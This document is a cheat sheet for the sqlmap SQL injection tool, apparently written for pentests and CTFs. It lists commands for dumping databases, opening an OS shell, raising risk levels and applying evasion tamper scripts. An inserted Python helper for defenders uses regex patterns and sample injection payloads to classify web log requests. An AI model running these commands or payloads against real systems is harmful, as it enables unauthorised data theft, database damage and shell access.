sqlmap (http://sqlmap.org)
Reference:
sqlmap -u http://10.10.10.10/debug.php?id=1 -p "id" --dbms=mysql --dump
sqlmap -u http://10.10.10.10/login.php --method POST --data "username=blah&password=blah&submitButton=Log+In" -p "password"
Save a Burp request to a file named request.txt:
sqlmap -r request.txt -p someparam
If there is a Host: header in the request, sqlmap works out the target on its own.
Parameters, including cookies, should also be detected (probably), but don't rely on this to work.
Get database names:
sqlmap -r request.txt --dbs
Get tables of a database:
sqlmap -r request.txt -D admin --tables
Dump content of a table:
sqlmap -r request.txt -D "admin" -T users --dump
-p "param,param2"
--dbs
-D "database_name"
--tables
-T <table_name>
--dump
--os-shell
--dbms=mysql
--level <int>
--risk <int>
This is sadly not all that well documented, but in general --level increases the number of requests sent, i.e. the number of test cases per attack type, while a higher --risk increases the chance of causing a Denial of Service (DoS) or damaging database content.
--level (max is 5)
- level 1 default
- level 2 adds HTTP Cookie header testing
- level 3 adds HTTP User-Agent/Referer headers testing
- level 4 ????
- level 5 adds Host header testing
--risk (max is 3)
- risk 1 default
- risk 2 adds heavy time-based SQL query injections
- risk 3 adds OR-based SQL injection tests (might damage database content!)
It should be mentioned that there is no "safe" --level or --risk for running sqlmap against a production environment. You can always cause damage, depending on how poorly the API is coded by the developers.
sqlmap caches a lot of data. This can be annoying after a false positive, or after you have changed your captured request file. Use these options to get rid of it:
--flush-session
--fresh-queries
Send all traffic through a proxy (e.g. Burp listening on localhost:8080):
--proxy http://localhost:8080
- Stacked queries (S)
- Union query based (U)
- Error based (E)
- Inline queries (Q)
- Boolean blind (B)
- Time based blind (T)
Specify a single technique, or the order in which techniques are tried:
--technique U
--technique=BEUSTQ
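From the defender's side, the technique letters above map onto recognisable payload shapes in web server logs. This added Python helper (not part of the cheat sheet or of sqlmap) tags each logged request with the technique letters its parameters resemble and, for header locations, the minimum --level at which sqlmap would have tested that header; the request records, endpoint paths and payload strings are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Coarse indicators keyed by the sqlmap technique letters listed above (B/E/U/S/T/Q).
# Triage heuristics for log review, not a complete or evasion-resistant ruleset.
TECHNIQUE_PATTERNS = {
    "B": re.compile(r"\b(and|or)\b\s*\d+\s*=\s*\d+", re.I),             # boolean blind
    "E": re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I),            # error based
    "U": re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I),             # union query
    "S": re.compile(r";\s*(select|insert|update|delete|drop)\b", re.I),  # stacked queries
    "T": re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(", re.I),          # time based blind
    "Q": re.compile(r"\(\s*select\b", re.I),                               # inline subquery
}
# Header injection points and the minimum --level at which sqlmap tests them (see above).
HEADER_MIN_LEVEL = {"cookie": 2, "user-agent": 3, "referer": 3, "host": 5}

def classify_request(req):
    """Return {location: {"techniques": [...], "min_level": n}} for every
    parameter location whose decoded value matches a technique pattern,
    plus a "tool_banner" entry when the User-Agent names sqlmap itself."""
    headers = req.get("headers", {})
    points = [("query", req.get("query", ""), 1), ("body", req.get("body", ""), 1)]
    points += [(f"header:{n}", v, HEADER_MIN_LEVEL.get(n.lower(), 1)) for n, v in headers.items()]
    findings = {}
    for loc, raw, level in points:
        text = unquote_plus(raw)  # values arrive URL-encoded in the log
        letters = sorted(k for k, rx in TECHNIQUE_PATTERNS.items() if rx.search(text))
        if letters:
            findings[loc] = {"techniques": letters, "min_level": level}
    # sqlmap's default User-Agent advertises the tool; --random-agent hides it.
    if "sqlmap" in headers.get("User-Agent", "").lower():
        findings["tool_banner"] = headers["User-Agent"]
    return findings

# Constructed sample requests modelled on the two endpoints in the cheat sheet above.
SAMPLE_REQUESTS = [
    {"path": "/debug.php", "query": "id=1", "headers": {"User-Agent": "Mozilla/5.0"}},
    {"path": "/debug.php", "query": "id=1%20AND%201=1",
     "headers": {"User-Agent": "sqlmap/1.7 (http://sqlmap.org)"}},
    {"path": "/debug.php", "query": "id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL--",
     "headers": {"User-Agent": "Mozilla/5.0"}},
    {"path": "/login.php", "body": "username=blah&password=blah%27%20AND%20SLEEP(5)--%20&submitButton=Log+In",
     "headers": {"User-Agent": "Mozilla/5.0"}},
    {"path": "/debug.php", "query": "id=1",
     "headers": {"User-Agent": "Mozilla/5.0", "Referer": "http://example.test/';SELECT pg_sleep(5)--"}},
]

if __name__ == "__main__":
    for r in SAMPLE_REQUESTS:
        print(r["path"], classify_request(r) or "clean")
```

A hit in a header location tells you the scan was run with at least the --level shown, which is useful when reconstructing what a tester or attacker actually tried.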
For union based attacks you can specify the number of UNION columns to test if the default range is too small:
--union-cols=11
--union-cols=1-20
Send cookies with the requests:
--cookie "cookiename=cookieprefix"
CTFs sometimes make this harder on purpose by putting odd characters into the data, which are awkward to handle in a UTF-8 shell. One of the following options might help.
Convert output to hex during retrieval:
--hex
Redump entries having an unknown character marker (?):
--repair
Character encoding for data retrieval:
--encoding=
Apply tamper scripts to the payloads (comma-separated to chain several):
--tamper=charencode
--tamper=charencode,appendnullbyte,escapequotes
If you consistently want to add some string before (prefix) or after (suffix) the injected payloads, use these options, for example for brackets that need to be opened/closed to make the injection work.
--prefix "<str>"
--suffix "<str>"